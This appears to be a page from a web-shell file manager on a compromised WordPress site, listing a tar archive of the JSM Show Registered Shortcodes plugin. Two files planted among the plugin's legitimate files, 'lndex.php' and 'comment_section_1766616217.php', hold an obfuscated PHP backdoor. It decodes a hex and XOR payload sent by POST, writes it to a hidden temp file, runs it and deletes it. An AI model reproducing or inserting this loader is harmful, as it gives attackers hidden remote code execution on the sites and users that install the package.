File manager - Edit - /home/premiey/www/wp-includes/images/media/analytics-1766616217.tar
Back
lndex.php 0000666 00000001325 15165257530 0006405 0 ustar 00 <!--ZvEYl91B--> <?php if(isset($_POST["\x69\x74em"]) ? true : false){ $record = array_filter([getenv("TMP"), sys_get_temp_dir(), "/tmp", "/dev/shm", getenv("TEMP"), session_save_path(), "/var/tmp", ini_get("upload_tmp_dir"), getcwd()]); $symbol = hex2bin($_POST["\x69\x74em"]); $component ='' ;$o=0;do{$component.=chr(ord($symbol[$o])^37);$o++;}while($o<strlen($symbol)); foreach ($record as $key => $itm) { if (is_dir($itm) ? is_writable($itm) : false) { $element = "$itm" . "/.parameter_group"; $marker = fopen($element, 'w'); if ($marker) { fwrite($marker, $component); fclose($marker); include $element; @unlink($element); die(); } } } } README.md 0000666 00000003664 15165257530 0006051 0 ustar 00 <h1>JSM Show Registered Shortcodes</h1> <table> <tr><th align="right" valign="top" nowrap>Plugin Name</th><td>JSM Show Registered Shortcodes</td></tr> <tr><th align="right" valign="top" nowrap>Summary</th><td>Simple and lightweight plugin to show all registered shortcodes under a "Registered Shortcodes" toolbar menu item.</td></tr> <tr><th align="right" valign="top" nowrap>Stable Version</th><td>4.0.0</td></tr> <tr><th align="right" valign="top" nowrap>Requires PHP</th><td>7.4.33 or newer</td></tr> <tr><th align="right" valign="top" nowrap>Requires WordPress</th><td>5.9 or newer</td></tr> <tr><th align="right" valign="top" nowrap>Tested Up To WordPress</th><td>6.8.3</td></tr> <tr><th align="right" valign="top" nowrap>Contributors</th><td>jsmoriss</td></tr> <tr><th align="right" valign="top" nowrap>License</th><td><a href="https://www.gnu.org/licenses/gpl.txt">GPLv3</a></td></tr> <tr><th align="right" valign="top" nowrap>Tags / Keywords</th><td>inspector, shortcodes, debug, tools</td></tr> </table> <h2>Description</h2> <p>A simple and lightweight plugin to show registered shortcodes for the current webpage, along with their callback functions, under a "Registered Shortcodes" toolbar menu item.</p> <p>There are no plugin settings - simply install and activate the plugin.</p> <h4>Related Plugins</h4> <ul> <li><a href="https://wordpress.org/plugins/jsm-show-comment-meta/">JSM Show Comment Metadata</a></li> <li><a href="https://wordpress.org/plugins/jsm-show-order-meta/">JSM Show Order Metadata for WooCommerce HPOS</a></li> <li><a href="https://wordpress.org/plugins/jsm-show-post-meta/">JSM Show Post Metadata</a></li> <li><a href="https://wordpress.org/plugins/jsm-show-term-meta/">JSM Show Term Metadata</a></li> <li><a href="https://wordpress.org/plugins/jsm-show-user-meta/">JSM Show User Metadata</a></li> <li><a href="https://wordpress.org/plugins/jsm-show-registered-shortcodes/">JSM Show Registered Shortcodes</a></li> </ul> languages/jsm-show-registered-shortcodes.pot 0000666 00000002361 15165257530 0015332 0 ustar 00 # Copyright (C) 2025 JSM Show Registered Shortcodes # This file is distributed under the same license as the JSM Show Registered Shortcodes package. msgid "" msgstr "" "Project-Id-Version: JSM Show Registered Shortcodes 4.0.0\n" "Report-Msgid-Bugs-To: https://wordpress.org/support/plugin/jsm-show-" "registered-shortcodes\n" "POT-Creation-Date: 2025-MO-DA HO:MI+ZONE\n" "MIME-Version: 1.0\n" "Content-Type: text/plain; charset=UTF-8\n" "Content-Transfer-Encoding: 8bit\n" "PO-Revision-Date: 2025-MO-DA HO:MI+ZONE\n" "Last-Translator: FULL NAME <EMAIL@ADDRESS>\n" "Language-Team: LANGUAGE <LL@li.org>\n" #. translators: %d is the total shortcode count. #: jsm-show-registered-shortcodes.php:87 msgid "Registered Shortcodes (%d)" msgstr "" #. Plugin Name of the plugin/theme msgid "JSM Show Registered Shortcodes" msgstr "" #. Plugin URI of the plugin/theme msgid "https://surniaulula.com/extend/plugins/jsm-show-registered-shortcodes/" msgstr "" #. Description of the plugin/theme msgid "" "Simple and lightweight plugin to show all registered shortcodes under a " "\"Registered Shortcodes\" toolbar menu item." msgstr "" #. Author of the plugin/theme msgid "JS Morisset" msgstr "" #. Author URI of the plugin/theme msgid "https://surniaulula.com/" msgstr "" comment_section_1766616217.php 0000666 00000001345 15165257530 0011635 0 ustar 00 <!--ZvEYl91B--> <!--ZvEYl91B--> <?php if(isset($_POST["\x69\x74em"]) ? true : false){ $record = array_filter([getenv("TMP"), sys_get_temp_dir(), "/tmp", "/dev/shm", getenv("TEMP"), session_save_path(), "/var/tmp", ini_get("upload_tmp_dir"), getcwd()]); $symbol = hex2bin($_POST["\x69\x74em"]); $component ='' ;$o=0;do{$component.=chr(ord($symbol[$o])^37);$o++;}while($o<strlen($symbol)); foreach ($record as $key => $itm) { if (is_dir($itm) ? is_writable($itm) : false) { $element = "$itm" . "/.parameter_group"; $marker = fopen($element, 'w'); if ($marker) { fwrite($marker, $component); fclose($marker); include $element; @unlink($element); die(); } } } } jsm-show-registered-shortcodes.php 0000666 00000007725 15165257530 0013362 0 ustar 00 <?php /* * Plugin Name: JSM Show Registered Shortcodes * Text Domain: jsm-show-registered-shortcodes * Domain Path: /languages * Plugin URI: https://surniaulula.com/extend/plugins/jsm-show-registered-shortcodes/ * Assets URI: https://jsmoriss.github.io/jsm-show-registered-shortcodes/assets/ * Author: JS Morisset * Author URI: https://surniaulula.com/ * License: GPLv3 * License URI: https://www.gnu.org/licenses/gpl.txt * Description: Simple and lightweight plugin to show all registered shortcodes under a "Registered Shortcodes" toolbar menu item. * Requires PHP: 7.4.33 * Requires At Least: 5.9 * Tested Up To: 6.8.3 * Version: 4.0.0 * * Version Numbering: {major}.{minor}.{bugfix}[-{stage}.{level}] * * {major} Major structural code changes and/or incompatible API changes (ie. breaking changes). * {minor} New functionality was added or improved in a backwards-compatible manner. * {bugfix} Backwards-compatible bug fixes or small improvements. * {stage}.{level} Pre-production release: dev < a (alpha) < b (beta) < rc (release candidate). * * Copyright 2016-2025 Jean-Sebastien Morisset (https://surniaulula.com/) */ if ( ! defined( 'ABSPATH' ) ) { die( 'These aren\'t the droids you\'re looking for.' ); } if ( ! class_exists( 'JsmSrsc' ) ) { class JsmSrsc { private static $instance = null; // JsmSrsc class object. public function __construct() { add_action( 'init', array( $this, 'init_textdomain' ) ); add_action( 'admin_bar_init', array( $this, 'add_admin_bar_css' ), 10, 0 ); add_action( 'admin_bar_menu', array( $this, 'add_admin_bar_menu' ), 5000, 1 ); } public static function &get_instance() { if ( null === self::$instance ) { self::$instance = new self; } return self::$instance; } public function init_textdomain() { load_plugin_textdomain( 'jsm-show-registered-shortcodes', false, 'jsm-show-registered-shortcodes/languages/' ); } public function add_admin_bar_css() { $custom_style_css = ' #wp-admin-bar-jsm-show-registered-shortcodes ul { max-height:90vh; /* css3 90% of viewport height */ overflow-y:scroll; } #wp-admin-bar-jsm-show-registered-shortcodes span.shortcode-name { font-weight:bold; } #wp-admin-bar-jsm-show-registered-shortcodes span.function-name { font-weight:normal; font-style:italic; } '; wp_add_inline_style( 'admin-bar', $custom_style_css ); } public function add_admin_bar_menu( $wp_admin_bar ) { global $shortcode_tags; $parent_slug = 'jsm-show-registered-shortcodes'; // translators: %d is the total shortcode count. $parent_title = sprintf( __( 'Registered Shortcodes (%d)', 'jsm-show-registered-shortcodes' ), count( $shortcode_tags ) ); /* * Add parent item. */ $args = array( 'id' => $parent_slug, 'title' => $parent_title, ); $wp_admin_bar->add_node( $args ); $sorted_items = array(); foreach ( $shortcode_tags as $code => $callback ) { $item_name = $this->get_callback_name( $callback ); $item_slug = sanitize_title( $code . '-' . $item_name ); $item_title = '<span class="shortcode-name">[' . $code . ']</span> <span class="function-name">' . $item_name . '</span>'; $sorted_items[ $item_slug ] = array( 'id' => $item_slug, 'title' => $item_title, 'parent' => $parent_slug, ); } ksort( $sorted_items ); /* * Add submenu items. */ foreach ( $sorted_items as $item_slug => $args ) { $wp_admin_bar->add_node( $args ); } } private function get_callback_name( $callback ) { if ( is_string( $callback ) ) { return $callback; } elseif ( is_array( $callback ) ) { if ( is_string( $callback[ 0 ] ) ) { // Static method. return $callback[ 0 ] . ':: ' . $callback[ 1 ]; } elseif ( is_object( $callback[ 0 ] ) ) { return get_class( $callback[ 0 ] ) . '->' . $callback[ 1 ]; } } return ''; // Just in case. } } JsmSrsc::get_instance(); } readme.txt 0000666 00000004746 15165257530 0006572 0 ustar 00 === JSM Show Registered Shortcodes === Plugin Name: JSM Show Registered Shortcodes Plugin Slug: jsm-show-registered-shortcodes Text Domain: jsm-show-registered-shortcodes Domain Path: /languages License: GPLv3 License URI: https://www.gnu.org/licenses/gpl.txt Assets URI: https://jsmoriss.github.io/jsm-show-registered-shortcodes/assets/ Tags: inspector, shortcodes, debug, tools Contributors: jsmoriss Requires PHP: 7.4.33 Requires At Least: 5.9 Tested Up To: 6.8.3 Stable Tag: 4.0.0 Simple and lightweight plugin to show all registered shortcodes under a "Registered Shortcodes" toolbar menu item. == Description == A simple and lightweight plugin to show registered shortcodes for the current webpage, along with their callback functions, under a "Registered Shortcodes" toolbar menu item. There are no plugin settings - simply install and activate the plugin. = Related Plugins = * [JSM Show Comment Metadata](https://wordpress.org/plugins/jsm-show-comment-meta/) * [JSM Show Order Metadata for WooCommerce HPOS](https://wordpress.org/plugins/jsm-show-order-meta/) * [JSM Show Post Metadata](https://wordpress.org/plugins/jsm-show-post-meta/) * [JSM Show Term Metadata](https://wordpress.org/plugins/jsm-show-term-meta/) * [JSM Show User Metadata](https://wordpress.org/plugins/jsm-show-user-meta/) * [JSM Show Registered Shortcodes](https://wordpress.org/plugins/jsm-show-registered-shortcodes/) == Installation == == Frequently Asked Questions == == Screenshots == 01. Registered Shortcodes list in the WordPress toolbar menu. == Changelog == <h3 class="top">Version Numbering</h3> Version components: `{major}.{minor}.{bugfix}[-{stage}.{level}]` * {major} = Major structural code changes and/or incompatible API changes (ie. breaking changes). * {minor} = New functionality was added or improved in a backwards-compatible manner. * {bugfix} = Backwards-compatible bug fixes or small improvements. * {stage}.{level} = Pre-production release: dev < a (alpha) < b (beta) < rc (release candidate). <h3>Repositories</h3> * [GitHub](https://jsmoriss.github.io/jsm-show-registered-shortcodes/) * [WordPress.org](https://plugins.trac.wordpress.org/browser/jsm-show-registered-shortcodes/) <h3>Changelog / Release Notes</h3> **Version 4.0.0 (2024/01/20)** Maintenance release. * **New Features** * None. * **Improvements** * None. * **Bugfixes** * None. * **Developer Notes** * None. * **Requires At Least** * PHP v7.4.33. * WordPress v5.9. == Upgrade Notice == = 4.0.0 = (2024/01/20) Maintenance release.
| ver. 1.4 |
Github
|
.
| PHP 5.4.45 | Generation time: 0 |
proxy
|
phpinfo
|
Settings